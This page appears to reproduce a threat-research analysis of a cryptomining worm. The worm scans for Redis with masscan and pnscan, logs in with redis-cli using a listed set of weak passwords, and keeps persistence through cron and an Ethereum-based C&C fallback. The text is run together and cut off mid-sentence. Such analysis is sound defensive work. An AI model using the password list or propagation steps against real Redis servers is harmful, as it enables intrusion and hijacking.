Comment
Author: Admin | 2025-04-28
Required software via apt-get or yum package managers. The required software includes redis-tools, iptables, wget, curl, and unhide.Kill hidden processes.Download and install masscan and pnscan.Download and execute rs.sh.Rs.shThis malicious, custom-made script is used to perform scans for Redis instances, with the following actions. Redis instances usually listen on port 6379. Two publicly available scanners are used for performing the Redis scanning task.Block all incoming traffic to port 6379 and allow only incoming traffic from the localhost using the iptables command.Create a .dat file that contains the following contents. This method was described in Scenario 1.Scan port 6379 with pnscan. In this method, pnscan sends bytes *1\r\n$4\r\ninfo\r\n and looks for os:Linux in the response from the scanned machine.Scan port 6379 with masscan. The scan is run with the shard parameter to randomly choose one of 22,000 IP address subsets.Scan port 6379 with masscan. In this scan, IP addresses from ranges of private IP addresses and ranges belonging to Alibaba Cloud, Chinanet Shanghai, and China Unicom are used.Scan port 6379 with masscan and take known IP addresses from the current network interfaces (using the ip a command).For active Redis instances (found via the scanning tasks mentioned in 3 to 6), run:redis-cli -h HOST -p PORT –raw -a PASSWORD –raw The list of weak passwords used include:empty passwordredisrootoraclepasswordp@aaw0rdabc123abc123!123456adminAfter a successful connection to the newly found Redis instance, the init.sh script is executed via Scenario 1 and the whole infection process is repeated.With the exception of the analyzed scripts above, this malware also uses a few binaries.The watchdog process, which is a Golang-based compiled file, functions mainly to start four watchdog threads:main_dog_protect_cron_threadThis checks persistence in cron, and if necessary, adds persistence.main_dog_protect_process_threadThis checks if required processes are running, and if not, starts them.main_dog_update_threadIf new versions are available, this updates the miner, config, scanner, and watchdog binaries.main_dog_protect_cc_threadThis checks if a command-and-control (C&C) server is active. If it’s not, this looks for a hard-coded address via the Ethereum blockchain explorer.The blockchain data is then transformed to the new C&C server address, which is a very useful feature especially when attackers lose their control of the current C&C servers. After a new C&C address is obtained, the thread checks if the server is active. If it is, the thread appends a hard-coded string with a URL path and downloads the init.ps or init.sh initialization scripts, and the whole infection process starts again from the beginning.As of the publication of this article, there are no transactions associated with the hard-coded Ethereum address.The scanner process, which is a Golang-based compiled executable, contains a set of exploits for various online services and devices.The main_scan procedure calls the following scanning methods:scan_exp_Cctv_exploitscan_exp_Redis_exploitscan_exp_Drupal_exploitscan_exp_Hadoop_exploitscan_exp_Spring_exploitscan_exp_Thinkphp_exploitscan_exp_Weblogic_exploitscan_exp_Sqlserver_exploitscan_exp_Elasticsearch_exploitAlibaba Cloud Security made an analysis of the scanner module with a list of exploits that is almost identical to the list above, with the addition of a new CCTV exploit routine.It’s important to note that there is also a version of Case 1 for Windows using PowerShell; the Task Scheduler is used for persistence, while netsh and net user are used
Add Comment